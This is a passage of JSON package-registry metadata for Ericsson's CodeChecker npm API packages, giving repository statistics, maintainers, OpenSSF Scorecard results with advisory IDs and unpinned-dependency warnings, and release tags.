,"avg_comments_per_issue":1.6678200692041523,"avg_comments_per_pull_request":0.7586805555555556,"merged_pull_requests_count":412,"bot_issues_count":0,"bot_pull_requests_count":59,"past_year_issues_count":89,"past_year_pull_requests_count":224,"past_year_avg_time_to_close_issue":3579611.04,"past_year_avg_time_to_close_pull_request":1482183.1176470588,"past_year_issues_closed_count":25,"past_year_pull_requests_closed_count":170,"past_year_pull_request_authors_count":37,"past_year_issue_authors_count":52,"past_year_avg_comments_per_issue":1.0337078651685394,"past_year_avg_comments_per_pull_request":0.5491071428571429,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":22,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/issues","maintainers":[{"login":"dkrupp","count":73,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"vodorok","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vodorok"},{"login":"Szelethus","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":49,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"},{"login":"cservakt","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"gamesh411","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"noraz31","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"feyruzb","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"stt08","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"csordasmarton","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/csordasmarton"}],"active_maintainers":[{"login":"dkrupp","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dkrupp"},{"login":"gulyasgergely902","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gulyasgergely902"},{"login":"gamesh411","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gamesh411"},{"login":"noraz31","count":16,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/noraz31"},{"login":"cservakt","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/cservakt"},{"login":"feyruzb","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/feyruzb"},{"login":"barnabasdomozi","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/barnabasdomozi"},{"login":"xb058t","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xb058t"},{"login":"stt08","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/stt08"},{"login":"Szelethus","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Szelethus"},{"login":"whisperity","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/whisperity"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/codechecker-api/related_packages","maintainers":[{"uuid":"gyorb","login":"gyorb","name":null,"email":"o.gyorgy@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~gyorb","role":null,"created_at":"2022-11-11T19:21:28.165Z","updated_at":"2022-11-11T19:21:28.165Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/gyorb/packages"},{"uuid":"csordasmarton","login":"csordasmarton","name":null,"email":"csordasmarton92@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~csordasmarton","role":null,"created_at":"2022-11-11T19:21:28.168Z","updated_at":"2022-11-11T19:21:28.168Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/csordasmarton/packages"},{"uuid":"bruntib","login":"bruntib","name":null,"email":"bruntib@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~bruntib","role":null,"created_at":"2022-11-11T19:21:28.188Z","updated_at":"2022-11-11T19:21:28.188Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/bruntib/packages"},{"uuid":"vodorok","login":"vodorok","name":null,"email":"vodorok@gmail.com","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~vodorok","role":null,"created_at":"2022-11-11T19:21:28.193Z","updated_at":"2022-11-11T19:21:28.193Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/vodorok/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5134204,"maintainers_count":1052507,"namespaces_count":313823,"keywords_count":730801,"github":"npm","metadata":{"funded_packages_count":155963},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-08T06:45:00.340Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1538457,"name":"codechecker-api-js","ecosystem":"npm","description":"Generated jQuery compatible API stubs for CodeChecker server.","homepage":"https://github.com/Ericsson/codechecker","licenses":"SEE LICENSE IN LICENSE","normalized_licenses":["ICU"],"repository_url":"https://github.com/Ericsson/codechecker","keywords_array":["codechecker","thrift","api"],"namespace":null,"versions_count":63,"first_release_published_at":"2020-02-17T13:23:24.908Z","latest_release_published_at":"2021-01-28T10:54:57.539Z","latest_release_number":"6.39.0","last_synced_at":"2025-08-19T18:10:29.698Z","created_at":"2022-04-09T05:00:23.856Z","updated_at":"2025-08-19T18:14:34.588Z","registry_url":"https://www.npmjs.com/package/codechecker-api-js","install_command":"npm install codechecker-api-js","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"6.39.0","dev":"6.39.0-dev1"}},"repo_metadata":{"id":37431651,"uuid":"37459110","full_name":"Ericsson/codechecker","owner":"Ericsson","description":"CodeChecker is an analyzer tooling, defect database and viewer extension for static and dynamic analyzer tools.","archived":false,"fork":false,"pushed_at":"2025-08-19T16:09:45.000Z","size":44800,"stargazers_count":2443,"open_issues_count":456,"forks_count":424,"subscribers_count":52,"default_branch":"master","last_synced_at":"2025-08-19T17:45:59.071Z","etag":null,"topics":["analysis","c","clang","clang-tidy","codechecker","cpp","database","defects","docker","linux","llvm","macosx","objective-c","results-viewer","static-analysis","static-analyzer","static-analyzers","vue"],"latest_commit_sha":null,"homepage":"https://codechecker.readthedocs.io","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ericsson.png","metadata":{"files":{"readme":"docs/README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE.TXT","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":"docs/supported_code_analyzers.md","governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null}},"created_at":"2015-06-15T10:38:51.000Z","updated_at":"2025-08-19T16:09:49.000Z","dependencies_parsed_at":"2023-09-29T11:42:30.441Z","dependency_job_id":"50b5428a-2bdc-4def-b0a6-a46baec9079d","html_url":"https://github.com/Ericsson/codechecker","commit_stats":{"total_commits":3749,"total_committers":127,"mean_commits":"29.519685039370078","dds":0.6054947986129635,"last_synced_commit":"4234fb7b91d07681ee032862fbb096197d5f104a"},"previous_names":[],"tags_count":90,"template":false,"template_full_name":null,"purl":"pkg:github/Ericsson/codechecker","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/sbom","scorecard":{"id":46490,"data":{"date":"2025-08-11","repo":{"name":"github.com/Ericsson/codechecker","commit":"49a939ab451d1b2a06553f17c4635a306527c33a"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.9,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 4 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/codechecker_master_analysis.yml:1","Warn: no topLevel permission defined: .github/workflows/codechecker_pr_analysis.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/config_coverage.yml:24","Info: topLevel permissions set to 'read-all': .github/workflows/docker.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/pypi.yml:9","Info: topLevel permissions set to 'read-all': .github/workflows/snap.yml:8","Info: topLevel permissions set to 'read-all': .github/workflows/test.yml:6","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.TXT:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE.TXT:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/docker.yml:11"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_master_analysis.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_master_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/codechecker_pr_analysis.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:32: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/config_coverage.yml:51: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/config_coverage.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/docker.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/docker.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/docker.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:64: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/pypi.yml:68: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/pypi.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/snap.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:17: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/snap.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/snap.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:91: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:92: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:117: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:154: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:199: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/Ericsson/codechecker/test.yml/master?enable=pin","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:1: pin your Docker image by updating ubuntu:18.04 to ubuntu:18.04@sha256:152dc042452c496007f07ca9127571cb9c29697f42acbfad72324b2bb2e43c98","Warn: containerImage not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:1: pin your Docker image by updating ubuntu:16.04 to ubuntu:16.04@sha256:1f1a2d56de1d604801a9671f301190704c25d604a416f59e03c04f5c6ffee0d6","Warn: containerImage not pinned by hash: docker/thrift/Dockerfile.thrift.noble:1: pin your Docker image by updating ubuntu:24.04 to ubuntu:24.04@sha256:a08e551cb33850e4740772b38217fc1796a66da2506d312abe51acda354ff061","Warn: containerImage not pinned by hash: web/docker/Dockerfile:5","Warn: containerImage not pinned by hash: web/docker/Dockerfile:43: pin your Docker image by updating python:3.10.16-slim-bullseye to python:3.10.16-slim-bullseye@sha256:c758f6d42a79466e943350a2c5273a09767bddc16a81d381ed21675a382205ee","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecos